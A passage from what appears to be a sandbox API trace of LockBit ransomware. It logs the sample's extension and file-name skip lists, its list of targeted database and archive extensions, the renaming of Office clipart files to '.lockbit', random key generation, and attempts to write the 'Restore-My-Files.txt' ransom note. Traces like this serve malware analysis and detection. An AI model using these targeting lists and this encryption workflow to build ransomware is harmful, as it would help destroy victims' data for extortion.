-1 [0106.472] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.472] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.472] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD19986_.WMF") returned 1 [0106.473] lstrcmpiW (lpString1="ntldr", lpString2="BD19986_.WMF") returned 1 [0106.473] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD19986_.WMF") returned 1 [0106.473] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD19986_.WMF") returned 1 [0106.473] lstrcmpiW (lpString1="autorun.inf", lpString2="BD19986_.WMF") returned -1 [0106.473] lstrcmpiW (lpString1="thumbs.db", lpString2="BD19986_.WMF") returned 1 [0106.473] lstrcmpiW (lpString1="iconcache.db", lpString2="BD19986_.WMF") returned 1 [0106.473] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.473] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF") returned=".WMF" [0106.473] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.473] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.473] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.474] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.474] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.474] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.474] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.474] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.lockbit") returned 72 [0106.474] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.474] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.474] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.474] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14486) returned 1 [0106.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.475] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.479] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.479] malloc (_Size=0xa6) returned 0x77d800 [0106.479] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.481] free (_Block=0x77d800) [0106.481] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19986_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.481] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.481] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.481] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1fa9b00, ftCreationTime.dwHighDateTime=0x1bd4d58, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe1fa9b00, ftLastWriteTime.dwHighDateTime=0x1bd4d58, nFileSizeHigh=0x0, nFileSizeLow=0x4780, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD19988_.WMF", cAlternateFileName="")) returned 1 [0106.482] lstrcmpiW (lpString1=".", lpString2="BD19988_.WMF") returned -1 [0106.482] lstrcmpiW (lpString1="..", lpString2="BD19988_.WMF") returned -1 [0106.482] PathFindExtensionW (pszPath="BD19988_.WMF") returned=".WMF" [0106.482] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.482] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.482] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD19988_.WMF") returned 1 [0106.483] lstrcmpiW (lpString1="ntldr", lpString2="BD19988_.WMF") returned 1 [0106.483] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD19988_.WMF") returned 1 [0106.483] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD19988_.WMF") returned 1 [0106.483] lstrcmpiW (lpString1="autorun.inf", lpString2="BD19988_.WMF") returned -1 [0106.483] lstrcmpiW (lpString1="thumbs.db", lpString2="BD19988_.WMF") returned 1 [0106.483] lstrcmpiW (lpString1="iconcache.db", lpString2="BD19988_.WMF") returned 1 [0106.483] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.483] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF") returned=".WMF" [0106.483] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.483] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.483] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.484] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.484] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.lockbit") returned 72 [0106.485] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19988_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.485] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.485] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.485] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=18304) returned 1 [0106.485] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.486] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.502] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.502] malloc (_Size=0xa6) returned 0x77d800 [0106.502] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0106.505] free (_Block=0x77d800) [0106.505] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19988_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.505] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.505] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.505] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf688200, ftCreationTime.dwHighDateTime=0x1bd4d58, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbf688200, ftLastWriteTime.dwHighDateTime=0x1bd4d58, nFileSizeHigh=0x0, nFileSizeLow=0x2b32, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD20013_.WMF", cAlternateFileName="")) returned 1 [0106.505] lstrcmpiW (lpString1=".", lpString2="BD20013_.WMF") returned -1 [0106.505] lstrcmpiW (lpString1="..", lpString2="BD20013_.WMF") returned -1 [0106.505] PathFindExtensionW (pszPath="BD20013_.WMF") returned=".WMF" [0106.505] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.505] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.505] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.505] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.505] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.505] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.505] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.505] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.505] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.505] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0106.506] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0106.506] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD20013_.WMF") returned 1 [0106.507] lstrcmpiW (lpString1="ntldr", lpString2="BD20013_.WMF") returned 1 [0106.507] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD20013_.WMF") returned 1 [0106.507] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD20013_.WMF") returned 1 [0106.507] lstrcmpiW (lpString1="autorun.inf", lpString2="BD20013_.WMF") returned -1 [0106.507] lstrcmpiW (lpString1="thumbs.db", lpString2="BD20013_.WMF") returned 1 [0106.507] lstrcmpiW (lpString1="iconcache.db", lpString2="BD20013_.WMF") returned 1 [0106.507] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0106.507] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned=".WMF" [0106.507] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0106.507] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0106.507] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0106.508] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0106.508] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.lockbit") returned 72 [0106.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0106.509] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0106.509] malloc (_Size=0x40068) returned 0x1ff1e60 [0106.509] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=11058) returned 1 [0106.509] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0106.510] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0106.511] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.515] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.lockbit", NtPathName=0x3d6b8e8, 